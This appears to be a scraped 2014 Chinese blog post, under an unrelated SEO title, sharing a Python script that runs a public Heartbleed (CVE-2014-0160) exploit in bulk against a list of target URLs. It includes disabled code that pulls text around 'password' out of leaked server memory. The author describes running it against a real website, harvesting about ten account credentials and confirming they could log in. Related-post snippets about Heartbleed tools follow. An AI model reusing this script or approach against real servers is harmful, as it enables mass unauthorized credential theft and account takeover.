python显示血量条_批量检测openssl(心脏出血)漏洞(新手学python)

最新推荐文章于 2020-12-22 10:17:21 发布
最新推荐文章于 2020-12-22 10:17:21 发布
阅读量192 收藏 1
点赞数
文章标签: python显示血量条

最近openssl(心脏滴血)漏洞挺火的,貌似这几天看到微博上有人说没多少危害之类的,不过根据亲测,发现危害还是比较大的。

所以找了个站,用for循环,批量抓了100个文件,大概10分钟左右完成,查找帐号和密码大概有10个左右,测试基本都是可以登录的,如果是访问量大的网站,可能段时间内能抓到更多!自己利用现有EXP写了个方便批量检测该漏洞的,主要是练手python,感觉不练进步太慢。贴上代码:

#coding:utf-8

import subprocess

import time

#遍历目标文件中的URL

def readtar(targetpath):

f=open(targetpath,"r")

for url in f.readlines():

url=url.strip("\r\n")

exploit(url)

#Exp执行,获取执行后的原始回显,发送给getres进行处理

def exploit(url):

cmd="python "+r"e:\0day\openssl\ssltest.py "+url

print cmd

expover=subprocess.Popen(cmd,stdout=subprocess.PIPE)

time.sleep(5)

expres=expover.stdout.read()

print expres

'''

#EXP执行回显筛选,获取有password的字符串

def getres(expres):

ispwd=False

if expres.find("password")>0:

ispwd=True

if ispwd==True:

keywords="password"

before=expres[expres.index(keywords)-280:expres.index(keywords)]

after=expres[expres.index(keywords)+len(keywords):expres.index(keywords)+len(keywords)+140]

passallstr=before+keywords+after

print passallstr

if len(passallstr)==0:

print "Maybe no pass or user in strings"

'''

if __name__=='__main__':

#注明测试目标所在文件

targetfile=r"e:\0day\url.txt"

readtar(targetfile)

主要还是借助公布的exp,只是增加了很简单的文件读取遍历挨个测试的代码,还想只打印出出现”password”关键字的前后几行,最后貌似还有点问题,所以注释掉了。

最后编辑:2014-04-13作者:admin

这个作者貌似有点懒,什么都没有留下。

weixin_40004960
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个检测OpenSSL心脏出血漏洞Python脚本分享
12-25
什么是“心脏出血漏洞? SSL标准包含一个心跳选项,允许SSL连接一端的电脑发出一简短的信息,确认另一端的电脑仍然在线,并获取反馈。研究人员发现,可以通过巧妙的手段发出恶意心跳信息,欺骗另一端的电脑泄露...
心脏滴血漏洞”测评经验分享
kukuxxg的博客
07-06 1387
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想习如何使用Mar
python显示血量_十分钟掌握Python数据可视化基本操作
weixin_39529903的博客
12-09 677
本文首发于公众号「老肥码码码」和之前习Pandas一样,我们继续以宝可梦数据集作为习可视化的例子,进而梳理Python绘图的基本操作,主要涉及seaborn以及matplotlib两个可视化库。上半部分我们主要使用matplotlib来进行柱状图、散点图、饼图折线图等的绘制,下半部分主要使用seaborn来进行箱线图、小提琴图、分簇散点图、热力图等的绘制。首先我们回顾一下整个数据集,列名依次为...
心脏滴血漏洞
lixue20141529的博客
09-03 7168
转自;http://blog.csdn.net/qq_32400847/article/details/58332946 2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。OpenSSL的Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy函数
OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例
weixin_30514745的博客
04-02 653
OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把。 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1. Nmap脚本ssl-heartbleed.nse:http://nmap.org/nsedoc/scripts/ssl-heartbleed.html 1 nmap -sV --...
一次简单的心脏滴血漏洞利用CVE-2014-0160
热门推荐
ranuy阮的博客
03-01 1万+
1、心脏滴血漏洞简述 2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞OpenSSL库中用到了该心跳协议。HeartBle...
ssl.tar.gz_python openssl_证书_证书验证
09-24
openssl实现客户端与服务器证书创建生成并验证
python3.8和openssl_1.1.1安装包.zip
01-15
1.【Python3.8.1安装包Windows64位】python-3.8.1-amd64.exe 2.【openssl安装包Windows64位】Win64OpenSSL-1_1_1d.exe 3.【https://pan.baidu.com/s/1XNS3SYjqrbf8RTVS5dvMqQ】百度网盘里也有,不用提取码,...
python-3.6.5_openssl1.1.1.tar
02-11
linux python-3.6.5与openssl-1.1.1源码及安装教程!安装文件官网下载很慢,可以通过csdn下载,本安装版本为3.6.5,64位安装器
Openssl-AES-Demo.rar_DEMO_openssl_openssl aes
07-13
Openssl AES 在C和C++ 的开发环境下实现的小演示。
心脏滴血poc
08-02
心脏滴血漏洞利用poc 环境要求 python2.7 python openssl.py ip -p 443
心脏出血漏洞扫描器-汉化版
03-14
.exe 文件,直接运行,无需敲命令,人性化的界面,打开就能上手,入门和精通的必备检测心脏出血漏洞的神器。
HeartbleedScanner汉化版心脏出血漏洞疲劳扫描器
08-11
一款很好用的检测心脏出血漏洞的扫描器,适用于安全管理员和服务器管理员,供大家使用
心脏滴血检测工具
04-24
通过该工具,可以批量指定网段检测心脏滴血漏洞,也可以指定不同的端口进行扫描
python漏洞检测脚本_一个检测OpenSSL心脏出血漏洞Python脚本分享
weixin_39781930的博客
12-22 333
接自: http://www.jb51.net/article/48858.htm什么是SSL?SSL是一种流行的加密技术,可以保护用户通过互联网传输的隐私信息。网站采用此加密技术后,第三方无法读取你与该网站之间的任何通讯信息。在后台,通过SSL加密的数据只有接收者才能解密。SSL最早在1994年由网景推出,1990年代以来已经被所有主流浏览器采纳。什么是“心脏出血漏洞?SSL标准包含一个心跳选...
heartBleed漏洞检查python脚本
oscarli的博客
11-17 1318
日前用burpsuite 检查一网站,使用heartBleed插件没有检查出来,但是openvas检查说有。在网上找python验证下,果然有。so,脚本记录下。#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The auth
心脏滴血HeartBleed漏洞研究及其POC
weixin_30367543的博客
12-12 453
一、漏洞原理: 首先声明,我虽然能看懂C和C++的每一行代码,但是他们连在一起我就不知道什么鬼东西了。所以关于代码说理的部分只能参考其他大牛的博客了。 1 /* 2 据说源码中有下面两语句,反正我也没看过源码。 3 */ 4 buffer = OPENSSL_malloc(1 + 2 + payload + padding); 5 bp = buffer; 还是据说p...
Openssl心脏出血漏洞分析及其利用
weixin_34186950的博客
04-11 800
本帖最后由 simeon 于 2014-4-11 10:54 编辑www.antian365.com simeon一、openssl漏洞形成原因4月7日,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞。在***社区,它被命名为“心脏出血”,表明网络上出现了“致命内伤”。利用该漏洞,***可以获取约30%的https开头网址的用户登录账号密码,其中包括购物、网银、社交、门户等类型的知名网...
Python实现php中openssl_encrypt
最新发布
04-27
可以使用Python的cryptography库来实现类似于PHP中openssl_encrypt的加密功能。下面是一个使用cryptography库实现AES-256-CBC加密的示例代码: ```python from cryptography.hazmat.primitives.ciphers import ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值